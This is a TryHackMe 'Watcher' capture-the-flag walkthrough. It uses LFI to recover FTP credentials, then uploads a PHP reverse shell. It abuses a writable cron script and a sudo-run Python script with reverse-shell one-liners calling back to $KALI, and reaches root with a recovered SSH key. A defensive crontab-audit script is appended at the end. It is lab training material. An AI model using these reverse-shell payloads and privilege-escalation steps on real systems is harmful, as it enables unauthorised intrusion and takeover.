Watcher
Room Link: https://tryhackme.com/room/watcher
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w SecLists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt
cat results.txt | grep -v 2422
I used my wordlist of files commonly found via LFI / RFI and confirmed I can view files on the server. I did not find anything useful.
Kali
ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w mylist.txt
cat results.txt | grep -v 2422
I remembered we had that secret file as well. I was able to read it, and it had some credentials for FTP.

TCP/21 - FTP
Kali
ftp $VICTIM
Username: ftpuser
Password: givemefiles777
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
nc -lvnp 1234
Kali(ftp)
put php-reverse-shell.php

Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Victim
sudo -l
Lateral Movement - mat
Victim
cat /etc/crontab
cd /home/toby/jobs/
sudo -u toby rm -f cow.sh
sudo -u toby touch cow.sh
sudo -u toby chmod 777 cow.sh
echo '#!/bin/bash' > cow.sh
echo 'sh -i >& /dev/tcp/$KALI/1338 0>&1' >> cow.sh
Kali
nc -lvnp 1338
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Lateral Movement - will
Victim(mat)
sudo -l

Kali
nc -lvnp 4242
Victim(mat)
cd /home/mat/scripts/
echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$KALI",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > cmd.py
sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Privilege Escalation
Victim(will)
cat /opt/backups/key.b64
Kali
chmod 600 id_rsa
ssh root@$VICTIM -i id_rsa 
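
The cow.sh step above relies on a cron job whose script can be rewritten by an account other than the one the job runs as. As an added example (not part of the original write-up), this shell function audits a crontab for that condition; it assumes the /etc/crontab format with a run-as user field, and the function names are my own.

```shell
#!/usr/bin/env bash
# Added example: audit a system crontab (the /etc/crontab format, which has a
# run-as user field) for jobs whose script another account can replace.

# Print the owner of a path, following symlinks.
owner_of() { ls -ldL "$1" | awk '{print $3}'; }

# Succeed if a path is world-writable, following symlinks.
world_writable() { [ -n "$(find -L "$1" -prune -perm -0002 2>/dev/null)" ]; }

# audit_cron FILE: print "run-as-user<TAB>script<TAB>reason" for each finding.
audit_cron() {
    local crontab="$1" line user cmd p o
    while IFS= read -r line; do
        set -f; set -- $line; set +f          # split into fields without globbing
        case "${1:-}" in
            ''|\#*|*=*) continue ;;           # blank, comment, VAR=value
            @*) shift 1 ;;                    # @reboot, @daily, ...
            *)  [ "$#" -ge 7 ] || continue; shift 5 ;;
        esac
        [ "$#" -ge 2 ] || continue
        user=$1 cmd=$2
        # Only absolute paths to existing files are checked; shell one-liners
        # such as "cd / && run-parts ..." need manual review.
        case "$cmd" in /*) [ -f "$cmd" ] || continue ;; *) continue ;; esac
        # Check the script and its directory: whoever controls the directory
        # can delete and recreate the script.
        for p in "$cmd" "$(dirname "$cmd")"; do
            o=$(owner_of "$p")
            if [ "$o" != "$user" ] && [ "$o" != root ]; then
                printf '%s\t%s\t%s is owned by %s\n' "$user" "$cmd" "$p" "$o"
            fi
            if world_writable "$p"; then
                printf '%s\t%s\t%s is world-writable\n' "$user" "$cmd" "$p"
            fi
        done
    done < "$crontab"
}

# Run against a file when one is given on the command line.
[ "$#" -eq 0 ] || audit_cron "$1"
```

Any line it prints is a job to fix: move the script to a directory owned by the run-as user (or root) and remove group and world write permission.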